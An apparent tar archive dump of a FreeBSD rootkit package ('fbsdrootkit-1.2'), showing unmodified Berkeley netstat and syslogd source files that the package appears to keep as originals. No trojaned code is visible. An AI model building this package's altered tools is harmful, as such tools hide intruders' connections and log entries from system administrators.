Address", "(state)"); first = 0; } if (Aflag) if (istcp) printf("%8x ", (int)inpcb.inp_ppcb); else printf("%8x ", (int)next); printf("%-5.5s %6ld %6ld ", name, sockb.so_rcv.sb_cc, sockb.so_snd.sb_cc); if (nflag) { inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport, name, 1); inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport, name, 1); } else { inetprint(&inpcb.inp_laddr, (int)inpcb.inp_lport, name, 0); inetprint(&inpcb.inp_faddr, (int)inpcb.inp_fport, name, inpcb.inp_lport != inpcb.inp_fport); } if (istcp) { if (tcpcb.t_state < 0 || tcpcb.t_state >= TCP_NSTATES) printf(" %d", tcpcb.t_state); else { printf(" %s", tcpstates[tcpcb.t_state]); #if defined(TF_NEEDSYN) && defined(TF_NEEDFIN) /* Show T/TCP `hidden state' */ if (tcpcb.t_flags & (TF_NEEDSYN|TF_NEEDFIN)) putchar('*'); #endif /* defined(TF_NEEDSYN) && defined(TF_NEEDFIN) */ } } putchar('\n'); prev = next; } } /* * Dump TCP statistics structure. */ void tcp_stats(off, name) u_long off; char *name; { struct tcpstat tcpstat; if (off == 0) return; printf ("%s:\n", name); kread(off, (char *)&tcpstat, sizeof (tcpstat)); #define p(f, m) if (tcpstat.f || sflag <= 1) \ printf(m, tcpstat.f, plural(tcpstat.f)) #define p2(f1, f2, m) if (tcpstat.f1 || tcpstat.f2 || sflag <= 1) \ printf(m, tcpstat.f1, plural(tcpstat.f1), tcpstat.f2, plural(tcpstat.f2)) #define p3(f, m) if (tcpstat.f || sflag <= 1) \ printf(m, tcpstat.f, plurales(tcpstat.f)) p(tcps_sndtotal, "\t%ld packet%s sent\n"); p2(tcps_sndpack,tcps_sndbyte, "\t\t%ld data packet%s (%ld byte%s)\n"); p2(tcps_sndrexmitpack, tcps_sndrexmitbyte, "\t\t%ld data packet%s (%ld byte%s) retransmitted\n"); p(tcps_mturesent, "\t\t%ld resend%s initiated by MTU discovery\n"); p2(tcps_sndacks, tcps_delack, "\t\t%ld ack-only packet%s (%ld delayed)\n"); p(tcps_sndurg, "\t\t%ld URG only packet%s\n"); p(tcps_sndprobe, "\t\t%ld window probe packet%s\n"); p(tcps_sndwinup, "\t\t%ld window update packet%s\n"); p(tcps_sndctrl, "\t\t%ld control packet%s\n"); p(tcps_rcvtotal, "\t%ld packet%s received\n"); p2(tcps_rcvackpack, tcps_rcvackbyte, "\t\t%ld ack%s (for %ld byte%s)\n"); p(tcps_rcvdupack, "\t\t%ld duplicate ack%s\n"); p(tcps_rcvacktoomuch, "\t\t%ld ack%s for unsent data\n"); p2(tcps_rcvpack, tcps_rcvbyte, "\t\t%ld packet%s (%ld byte%s) received in-sequence\n"); p2(tcps_rcvduppack, tcps_rcvdupbyte, "\t\t%ld completely duplicate packet%s (%ld byte%s)\n"); p(tcps_pawsdrop, "\t\t%ld old duplicate packet%s\n"); p2(tcps_rcvpartduppack, tcps_rcvpartdupbyte, "\t\t%ld packet%s with some dup. data (%ld byte%s duped)\n"); p2(tcps_rcvoopack, tcps_rcvoobyte, "\t\t%ld out-of-order packet%s (%ld byte%s)\n"); p2(tcps_rcvpackafterwin, tcps_rcvbyteafterwin, "\t\t%ld packet%s (%ld byte%s) of data after window\n"); p(tcps_rcvwinprobe, "\t\t%ld window probe%s\n"); p(tcps_rcvwinupd, "\t\t%ld window update packet%s\n"); p(tcps_rcvafterclose, "\t\t%ld packet%s received after close\n"); p(tcps_rcvbadsum, "\t\t%ld discarded for bad checksum%s\n"); p(tcps_rcvbadoff, "\t\t%ld discarded for bad header offset field%s\n"); p(tcps_rcvshort, "\t\t%ld discarded because packet too short\n"); p(tcps_connattempt, "\t%ld connection request%s\n"); p(tcps_accepts, "\t%ld connection accept%s\n"); p(tcps_badsyn, "\t%ld bad connection attempt%s\n"); p(tcps_listendrop, "\t%ld listen queue overflow%s\n"); p(tcps_connects, "\t%ld connection%s established (including accepts)\n"); p2(tcps_closed, tcps_drops, "\t%ld connection%s closed (including %ld drop%s)\n"); p(tcps_cachedrtt, "\t\t%ld connection%s updated cached RTT on close\n"); p(tcps_cachedrttvar, "\t\t%ld connection%s updated cached RTT variance on close\n"); p(tcps_cachedssthresh, "\t\t%ld connection%s updated cached ssthresh on close\n"); p(tcps_conndrops, "\t%ld embryonic connection%s dropped\n"); p2(tcps_rttupdated, tcps_segstimed, "\t%ld segment%s updated rtt (of %ld attempt%s)\n"); p(tcps_rexmttimeo, "\t%ld retransmit timeout%s\n"); p(tcps_timeoutdrop, "\t\t%ld connection%s dropped by rexmit timeout\n"); p(tcps_persisttimeo, "\t%ld persist timeout%s\n"); p(tcps_persistdrop, "\t\t%ld connection%s dropped by persist timeout\n"); p(tcps_keeptimeo, "\t%ld keepalive timeout%s\n"); p(tcps_keepprobe, "\t\t%ld keepalive probe%s sent\n"); p(tcps_keepdrops, "\t\t%ld connection%s dropped by keepalive\n"); p(tcps_predack, "\t%ld correct ACK header prediction%s\n"); p(tcps_preddat, "\t%ld correct data packet header prediction%s\n"); #undef p #undef p2 #undef p3 } /* * Dump UDP statistics structure. */ void udp_stats(off, name) u_long off; char *name; { struct udpstat udpstat; u_long delivered; if (off == 0) return; kread(off, (char *)&udpstat, sizeof (udpstat)); printf("%s:\n", name); #define p(f, m) if (udpstat.f || sflag <= 1) \ printf(m, udpstat.f, plural(udpstat.f)) p(udps_ipackets, "\t%lu datagram%s received\n"); p(udps_hdrops, "\t%lu with incomplete header\n"); p(udps_badlen, "\t%lu with bad data length field\n"); p(udps_badsum, "\t%lu with bad checksum\n"); p(udps_noport, "\t%lu dropped due to no socket\n"); p(udps_noportbcast, "\t%lu broadcast/multicast datagram%s dropped due to no socket\n"); p(udps_fullsock, "\t%lu dropped due to full socket buffers\n"); p(udpps_pcbhashmiss, "\t%lu not for hashed pcb\n"); delivered = udpstat.udps_ipackets - udpstat.udps_hdrops - udpstat.udps_badlen - udpstat.udps_badsum - udpstat.udps_noport - udpstat.udps_noportbcast - udpstat.udps_fullsock; if (delivered || sflag <= 1) printf("\t%lu delivered\n", delivered); p(udps_opackets, "\t%lu datagram%s output\n"); #undef p } /* * Dump IP statistics structure. */ void ip_stats(off, name) u_long off; char *name; { struct ipstat ipstat; if (off == 0) return; kread(off, (char *)&ipstat, sizeof (ipstat)); printf("%s:\n", name); #define p(f, m) if (ipstat.f || sflag <= 1) \ printf(m, ipstat.f, plural(ipstat.f)) p(ips_total, "\t%lu total packet%s received\n"); p(ips_badsum, "\t%lu bad header checksum%s\n"); p(ips_toosmall, "\t%lu with size smaller than minimum\n"); p(ips_tooshort, "\t%lu with data size < data length\n"); p(ips_badhlen, "\t%lu with header length < data size\n"); p(ips_badlen, "\t%lu with data length < header length\n"); p(ips_badoptions, "\t%lu with bad options\n"); p(ips_badvers, "\t%lu with incorrect version number\n"); p(ips_fragments, "\t%lu fragment%s received\n"); p(ips_fragdropped, "\t%lu fragment%s dropped (dup or out of space)\n"); p(ips_fragtimeout, "\t%lu fragment%s dropped after timeout\n"); p(ips_reassembled, "\t%lu packet%s reassembled ok\n"); p(ips_delivered, "\t%lu packet%s for this host\n"); p(ips_noproto, "\t%lu packet%s for unknown/unsupported protocol\n"); p(ips_forward, "\t%lu packet%s forwarded\n"); p(ips_cantforward, "\t%lu packet%s not forwardable\n"); p(ips_redirectsent, "\t%lu redirect%s sent\n"); p(ips_localout, "\t%lu packet%s sent from this host\n"); p(ips_rawout, "\t%lu packet%s sent with fabricated ip header\n"); p(ips_odropped, "\t%lu output packet%s dropped due to no bufs, etc.\n"); p(ips_noroute, "\t%lu output packet%s discarded due to no route\n"); p(ips_fragmented, "\t%lu output datagram%s fragmented\n"); p(ips_ofragments, "\t%lu fragment%s created\n"); p(ips_cantfrag, "\t%lu datagram%s that can't be fragmented\n"); #undef p } static char *icmpnames[] = { "echo reply", "#1", "#2", "destination unreachable", "source quench", "routing redirect", "#6", "#7", "echo", "router advertisement", "router solicitation", "time exceeded", "parameter problem", "time stamp", "time stamp reply", "information request", "information request reply", "address mask request", "address mask reply", }; /* * Dump ICMP statistics. */ void icmp_stats(off, name) u_long off; char *name; { struct icmpstat icmpstat; register int i, first; if (off == 0) return; kread(off, (char *)&icmpstat, sizeof (icmpstat)); printf("%s:\n", name); #define p(f, m) if (icmpstat.f || sflag <= 1) \ printf(m, icmpstat.f, plural(icmpstat.f)) p(icps_error, "\t%lu call%s to icmp_error\n"); p(icps_oldicmp, "\t%lu error%s not generated 'cuz old message was icmp\n"); for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++) if (icmpstat.icps_outhist[i] != 0) { if (first) { printf("\tOutput histogram:\n"); first = 0; } printf("\t\t%s: %lu\n", icmpnames[i], icmpstat.icps_outhist[i]); } p(icps_badcode, "\t%lu message%s with bad code fields\n"); p(icps_tooshort, "\t%lu message%s < minimum length\n"); p(icps_checksum, "\t%lu bad checksum%s\n"); p(icps_badlen, "\t%lu message%s with bad length\n"); for (first = 1, i = 0; i < ICMP_MAXTYPE + 1; i++) if (icmpstat.icps_inhist[i] != 0) { if (first) { printf("\tInput histogram:\n"); first = 0; } printf("\t\t%s: %lu\n", icmpnames[i], icmpstat.icps_inhist[i]); } p(icps_reflect, "\t%lu message response%s generated\n"); #undef p } /* * Dump IGMP statistics structure. */ void igmp_stats(off, name) u_long off; char *name; { struct igmpstat igmpstat; if (off == 0) return; kread(off, (char *)&igmpstat, sizeof (igmpstat)); printf("%s:\n", name); #define p(f, m) if (igmpstat.f || sflag <= 1) \ printf(m, igmpstat.f, plural(igmpstat.f)) #define py(f, m) if (igmpstat.f || sflag <= 1) \ printf(m, igmpstat.f, igmpstat.f != 1 ? "ies" : "y") p(igps_rcv_total, "\t%u message%s received\n"); p(igps_rcv_tooshort, "\t%u message%s received with too few bytes\n"); p(igps_rcv_badsum, "\t%u message%s received with bad checksum\n"); py(igps_rcv_queries, "\t%u membership quer%s received\n"); py(igps_rcv_badqueries, "\t%u membership quer%s received with invalid field(s)\n"); p(igps_rcv_reports, "\t%u membership report%s received\n"); p(igps_rcv_badreports, "\t%u membership report%s received with invalid field(s)\n"); p(igps_rcv_ourreports, "\t%u membership report%s received for groups to which we belong\n"); p(igps_snd_reports, "\t%u membership report%s sent\n"); #undef p #undef py } /* * Pretty print an Internet address (net address + port). */ void inetprint(in, port, proto,numeric) register struct in_addr *in; int port; char *proto; int numeric; { struct servent *sp = 0; char line[80], *cp; int width; sprintf(line, "%.*s.", (Aflag && !numeric) ? 12 : 16, inetname(in)); cp = index(line, '\0'); if (!numeric && port) sp = getservbyport((int)port, proto); if (sp || port == 0) sprintf(cp, "%.15s", sp ? sp->s_name : "*"); else sprintf(cp, "%d", ntohs((u_short)port)); width = Aflag ? 18 : 22; printf(" %-*.*s", width, width, line); } /* * Construct an Internet address representation. * If the nflag has been supplied, give * numeric value, otherwise try for symbolic name. */ char * inetname(inp) struct in_addr *inp; { register char *cp; static char line[50]; struct hostent *hp; struct netent *np; cp = 0; if (!nflag && inp->s_addr != INADDR_ANY) { int net = inet_netof(*inp); int lna = inet_lnaof(*inp); if (lna == INADDR_ANY) { np = getnetbyaddr(net, AF_INET); if (np) cp = np->n_name; } if (cp == 0) { hp = gethostbyaddr((char *)inp, sizeof (*inp), AF_INET); if (hp) { cp = hp->h_name; trimdomain(cp); } } } if (inp->s_addr == INADDR_ANY) strcpy(line, "*"); else if (cp) strcpy(line, cp); else { inp->s_addr = ntohl(inp->s_addr); #define C(x) ((x) & 0xff) sprintf(line, "%lu.%lu.%lu.%lu", C(inp->s_addr >> 24), C(inp->s_addr >> 16), C(inp->s_addr >> 8), C(inp->s_addr)); } return (line); } fbsdrootkit-1.2/netstat/unix.c.dist100600 764 0 10243 6256130347 15245 0ustar dfroot/*- * Copyright (c) 1983, 1988, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char sccsid[] = "@(#)unix.c 8.1 (Berkeley) 6/6/93"; #endif /* not lint */ /* * Display protocol blocks in the unix domain. */ #include #include #include #include #include #include #include #include #include #define KERNEL struct uio; struct proc; #include #include #include #include #include "netstat.h" static void unixdomainpr __P((struct socket *, caddr_t)); static struct file *file, *fileNFILE; static int nfiles; extern kvm_t *kvmd; void unixpr(off) u_long off; { register struct file *fp; struct socket sock, *so = &sock; char *filebuf; struct protosw *unixsw = (struct protosw *)off; filebuf = (char *)kvm_getfiles(kvmd, KERN_FILE, 0, &nfiles); if (filebuf == 0) { printf("Out of memory (file table).\n"); return; } file = (struct file *)(filebuf + sizeof(fp)); fileNFILE = file + nfiles; for (fp = file; fp < fileNFILE; fp++) { if (fp->f_count == 0 || fp->f_type != DTYPE_SOCKET) continue; if (kread((u_long)fp->f_data, (char *)so, sizeof (*so))) continue; /* kludge */ if (so->so_proto >= unixsw && so->so_proto <= unixsw + 2) if (so->so_pcb) unixdomainpr(so, fp->f_data); } } static char *socktype[] = { "#0", "stream", "dgram", "raw", "rdm", "seqpacket" }; static void unixdomainpr(so, soaddr) register struct socket *so; caddr_t soaddr; { struct unpcb unpcb, *unp = &unpcb; struct mbuf mbuf, *m; struct sockaddr_un *sa; static int first = 1; if (kread((u_long)so->so_pcb, (char *)unp, sizeof (*unp))) return; if (unp->unp_addr) { m = &mbuf; if (kread((u_long)unp->unp_addr, (char *)m, sizeof (*m))) m = (struct mbuf *)0; sa = (struct sockaddr_un *)(m->m_dat); } else m = (struct mbuf *)0; if (first) { printf("Active UNIX domain sockets\n"); printf( "%-8.8s %-6.6s %-6.6s %-6.6s %8.8s %8.8s %8.8s %8.8s Addr\n", "Address", "Type", "Recv-Q", "Send-Q", "Inode", "Conn", "Refs", "Nextref"); first = 0; } printf("%8x %-6.6s %6d %6d %8x %8x %8x %8x", soaddr, socktype[so->so_type], so->so_rcv.sb_cc, so->so_snd.sb_cc, unp->unp_vnode, unp->unp_conn, unp->unp_refs, unp->unp_nextref); if (m) printf(" %.*s", m->m_len - (int)(sizeof(*sa) - sizeof(sa->sun_path)), sa->sun_path); putchar('\n'); } fbsdrootkit-1.2/netstat/Makefile.dist100600 764 0 412 6257642722 15521 0ustar dfroot# @(#)Makefile 8.1 (Berkeley) 6/12/93 PROG= netstat SRCS= if.c inet.c iso.c main.c mbuf.c mroute.c ns.c route.c \ tp_astring.c unix.c CFLAGS+=-I/sys .PATH: ${.CURDIR}/../../sys/netiso BINGRP= kmem BINMODE=2555 LDADD= -lkvm DPADD= ${LIBKVM} .include fbsdrootkit-1.2/syslogd/ 40700 764 764 0 6256606643 12535 5ustar dfdffbsdrootkit-1.2/syslogd/Makefile100600 764 764 256 5620352540 14243 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/6/93 PROG= syslogd SRCS= syslogd.c ttymsg.c .PATH: ${.CURDIR}/../../usr.bin/wall MAN5= syslog.conf.5 MAN8= syslogd.8 .include fbsdrootkit-1.2/syslogd/pathnames.h100600 764 764 3733 5571035340 14760 0ustar dfdf/* * Copyright (c) 1989, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * @(#)pathnames.h 8.1 (Berkeley) 6/6/93 */ #include #define _PATH_KLOG "/dev/klog" #define _PATH_LOGCONF "/etc/syslog.conf" #define _PATH_LOGPID "/var/run/syslog.pid" fbsdrootkit-1.2/syslogd/syslogd.c.dist100600 764 764 65734 6256132531 15453 0ustar dfdf/* * Copyright (c) 1983, 1988, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1988, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)syslogd.c 8.3 (Berkeley) 4/4/94"; #endif /* not lint */ /* * syslogd -- log system messages * * This program implements a system log. It takes a series of lines. * Each line may have a priority, signified as "" as * the first characters of the line. If this is * not present, a default priority is used. * * To kill syslogd, send a signal 15 (terminate). A signal 1 (hup) will * cause it to reread its configuration file. * * Defined Constants: * * MAXLINE -- the maximimum line length that can be handled. * DEFUPRI -- the default priority for user messages * DEFSPRI -- the default priority for kernel messages * * Author: Eric Allman * extensive changes by Ralph Campbell * more extensive changes by Eric Allman (again) * Extension to log by program name as well as facility and priority * by Peter da Silva. */ #define MAXLINE 1024 /* maximum line length */ #define MAXSVLINE 120 /* maximum saved line length */ #define DEFUPRI (LOG_USER|LOG_NOTICE) #define DEFSPRI (LOG_KERN|LOG_CRIT) #define TIMERINTVL 30 /* interval for checking flush, mark */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "pathnames.h" #define SYSLOG_NAMES #include char *LogName = _PATH_LOG; char *ConfFile = _PATH_LOGCONF; char *PidFile = _PATH_LOGPID; char ctty[] = _PATH_CONSOLE; #define FDMASK(fd) (1 << (fd)) #define dprintf if (Debug) printf #define MAXUNAMES 20 /* maximum number of user names */ /* * Flags to logmsg(). */ #define IGN_CONS 0x001 /* don't print on console */ #define SYNC_FILE 0x002 /* do fsync on file after printing */ #define ADDDATE 0x004 /* add a date to the message */ #define MARK 0x008 /* this message is a mark */ /* * This structure represents the files that will have log * copies printed. */ struct filed { struct filed *f_next; /* next in linked list */ short f_type; /* entry type, see below */ short f_file; /* file descriptor */ time_t f_time; /* time this was last written */ u_char f_pmask[LOG_NFACILITIES+1]; /* priority mask */ char *f_program; /* program this applies to */ union { char f_uname[MAXUNAMES][UT_NAMESIZE+1]; struct { char f_hname[MAXHOSTNAMELEN+1]; struct sockaddr_in f_addr; } f_forw; /* forwarding address */ char f_fname[MAXPATHLEN]; } f_un; char f_prevline[MAXSVLINE]; /* last message logged */ char f_lasttime[16]; /* time of last occurrence */ char f_prevhost[MAXHOSTNAMELEN+1]; /* host from which recd. */ int f_prevpri; /* pri of f_prevline */ int f_prevlen; /* length of f_prevline */ int f_prevcount; /* repetition cnt of prevline */ int f_repeatcount; /* number of "repeated" msgs */ }; /* * Intervals at which we flush out "message repeated" messages, * in seconds after previous message is logged. After each flush, * we move to the next interval until we reach the largest. */ int repeatinterval[] = { 30, 120, 600 }; /* # of secs before flush */ #define MAXREPEAT ((sizeof(repeatinterval) / sizeof(repeatinterval[0])) - 1) #define REPEATTIME(f) ((f)->f_time + repeatinterval[(f)->f_repeatcount]) #define BACKOFF(f) { if (++(f)->f_repeatcount > MAXREPEAT) \ (f)->f_repeatcount = MAXREPEAT; \ } /* values for f_type */ #define F_UNUSED 0 /* unused entry */ #define F_FILE 1 /* regular file */ #define F_TTY 2 /* terminal */ #define F_CONSOLE 3 /* console terminal */ #define F_FORW 4 /* remote machine */ #define F_USERS 5 /* list of users */ #define F_WALL 6 /* everyone logged on */ char *TypeNames[7] = { "UNUSED", "FILE", "TTY", "CONSOLE", "FORW", "USERS", "WALL" }; struct filed *Files; struct filed consfile; int Debug; /* debug flag */ char LocalHostName[MAXHOSTNAMELEN+1]; /* our hostname */ char *LocalDomain; /* our local domain name */ int InetInuse = 0; /* non-zero if INET sockets are being used */ int finet; /* Internet datagram socket */ int LogPort; /* port number for INET connections */ int Initialized = 0; /* set when we have initialized ourselves */ int MarkInterval = 20 * 60; /* interval between marks in seconds */ int MarkSeq = 0; /* mark sequence number */ void cfline __P((char *, struct filed *, char *)); char *cvthname __P((struct sockaddr_in *)); int decode __P((const char *, CODE *)); void die __P((int)); void domark __P((int)); void fprintlog __P((struct filed *, int, char *)); void init __P((int)); void logerror __P((char *)); void logmsg __P((int, char *, char *, int)); void printline __P((char *, char *)); void printsys __P((char *)); void reapchild __P((int)); char *ttymsg __P((struct iovec *, int, char *, int)); void usage __P((void)); void wallmsg __P((struct filed *, struct iovec *)); int main(argc, argv) int argc; char *argv[]; { int ch, funix, i, inetm, fklog, klogm, len; struct sockaddr_un sunx, fromunix; struct sockaddr_in sin, frominet; FILE *fp; char *p, line[MSG_BSIZE + 1]; while ((ch = getopt(argc, argv, "df:m:p:")) != EOF) switch(ch) { case 'd': /* debug */ Debug++; break; case 'f': /* configuration file */ ConfFile = optarg; break; case 'm': /* mark interval */ MarkInterval = atoi(optarg) * 60; break; case 'p': /* path */ LogName = optarg; break; case '?': default: usage(); } if ((argc -= optind) != 0) usage(); if (!Debug) (void)daemon(0, 0); else setlinebuf(stdout); consfile.f_type = F_CONSOLE; (void)strcpy(consfile.f_un.f_fname, ctty); (void)gethostname(LocalHostName, sizeof(LocalHostName)); if ((p = strchr(LocalHostName, '.')) != NULL) { *p++ = '\0'; LocalDomain = p; } else LocalDomain = ""; (void)signal(SIGTERM, die); (void)signal(SIGINT, Debug ? die : SIG_IGN); (void)signal(SIGQUIT, Debug ? die : SIG_IGN); (void)signal(SIGCHLD, reapchild); (void)signal(SIGALRM, domark); (void)alarm(TIMERINTVL); (void)unlink(LogName); #ifndef SUN_LEN #define SUN_LEN(unp) (strlen((unp)->sun_path) + 2) #endif memset(&sunx, 0, sizeof(sunx)); sunx.sun_family = AF_UNIX; (void)strncpy(sunx.sun_path, LogName, sizeof(sunx.sun_path)); funix = socket(AF_UNIX, SOCK_DGRAM, 0); if (funix < 0 || bind(funix, (struct sockaddr *)&sunx, SUN_LEN(&sunx)) < 0 || chmod(LogName, 0666) < 0) { (void) sprintf(line, "cannot create %s", LogName); logerror(line); dprintf("cannot create %s (%d)\n", LogName, errno); die(0); } finet = socket(AF_INET, SOCK_DGRAM, 0); inetm = 0; if (finet >= 0) { struct servent *sp; sp = getservbyname("syslog", "udp"); if (sp == NULL) { errno = 0; logerror("syslog/udp: unknown service"); die(0); } memset(&sin, 0, sizeof(sin)); sin.sin_family = AF_INET; sin.sin_port = LogPort = sp->s_port; if (bind(finet, (struct sockaddr *)&sin, sizeof(sin)) < 0) { logerror("bind"); if (!Debug) die(0); } else { inetm = FDMASK(finet); InetInuse = 1; } } if ((fklog = open(_PATH_KLOG, O_RDONLY, 0)) >= 0) klogm = FDMASK(fklog); else { dprintf("can't open %s (%d)\n", _PATH_KLOG, errno); klogm = 0; } /* tuck my process id away */ fp = fopen(PidFile, "w"); if (fp != NULL) { fprintf(fp, "%d\n", getpid()); (void) fclose(fp); } dprintf("off & running....\n"); init(0); (void)signal(SIGHUP, init); for (;;) { int nfds, readfds = FDMASK(funix) | inetm | klogm; dprintf("readfds = %#x\n", readfds); nfds = select(20, (fd_set *)&readfds, (fd_set *)NULL, (fd_set *)NULL, (struct timeval *)NULL); if (nfds == 0) continue; if (nfds < 0) { if (errno != EINTR) logerror("select"); continue; } dprintf("got a message (%d, %#x)\n", nfds, readfds); if (readfds & klogm) { i = read(fklog, line, sizeof(line) - 1); if (i > 0) { line[i] = '\0'; printsys(line); } else if (i < 0 && errno != EINTR) { logerror("klog"); fklog = -1; klogm = 0; } } if (readfds & FDMASK(funix)) { len = sizeof(fromunix); i = recvfrom(funix, line, MAXLINE, 0, (struct sockaddr *)&fromunix, &len); if (i > 0) { line[i] = '\0'; printline(LocalHostName, line); } else if (i < 0 && errno != EINTR) logerror("recvfrom unix"); } if (readfds & inetm) { len = sizeof(frominet); i = recvfrom(finet, line, MAXLINE, 0, (struct sockaddr *)&frominet, &len); if (i > 0) { line[i] = '\0'; printline(cvthname(&frominet), line); } else if (i < 0 && errno != EINTR) logerror("recvfrom inet"); } } } void usage() { (void)fprintf(stderr, "usage: syslogd [-f conffile] [-m markinterval] [-p logpath]\n"); exit(1); } /* * Take a raw input line, decode the message, and print the message * on the appropriate log files. */ void printline(hname, msg) char *hname; char *msg; { int c, pri; char *p, *q, line[MAXLINE + 1]; /* test for special codes */ pri = DEFUPRI; p = msg; if (*p == '<') { pri = 0; while (isdigit(*++p)) pri = 10 * pri + (*p - '0'); if (*p == '>') ++p; } if (pri &~ (LOG_FACMASK|LOG_PRIMASK)) pri = DEFUPRI; /* don't allow users to log kernel messages */ if (LOG_FAC(pri) == LOG_KERN) pri = LOG_MAKEPRI(LOG_USER, LOG_PRI(pri)); q = line; while ((c = *p++ & 0177) != '\0' && q < &line[sizeof(line) - 1]) if (iscntrl(c)) if (c == '\n') *q++ = ' '; else if (c == '\t') *q++ = '\t'; else { *q++ = '^'; *q++ = c ^ 0100; } else *q++ = c; *q = '\0'; logmsg(pri, line, hname, 0); } /* * Take a raw input line from /dev/klog, split and format similar to syslog(). */ void printsys(msg) char *msg; { int c, pri, flags; char *lp, *p, *q, line[MAXLINE + 1]; (void)strcpy(line, getbootfile()); (void)strcat(line, ": "); lp = line + strlen(line); for (p = msg; *p != '\0'; ) { flags = SYNC_FILE | ADDDATE; /* fsync file after write */ pri = DEFSPRI; if (*p == '<') { pri = 0; while (isdigit(*++p)) pri = 10 * pri + (*p - '0'); if (*p == '>') ++p; } else { /* kernel printf's come out on console */ flags |= IGN_CONS; } if (pri &~ (LOG_FACMASK|LOG_PRIMASK)) pri = DEFSPRI; q = lp; while (*p != '\0' && (c = *p++) != '\n' && q < &line[MAXLINE]) *q++ = c; *q = '\0'; logmsg(pri, line, LocalHostName, flags); } } time_t now; /* * Log a message to the appropriate log files, users, etc. based on * the priority. */ void logmsg(pri, msg, from, flags) int pri; char *msg, *from; int flags; { struct filed *f; int fac, msglen, omask, prilev; char *timestamp; char prog[NAME_MAX+1]; int i; dprintf("logmsg: pri %o, flags %x, from %s, msg %s\n", pri, flags, from, msg); 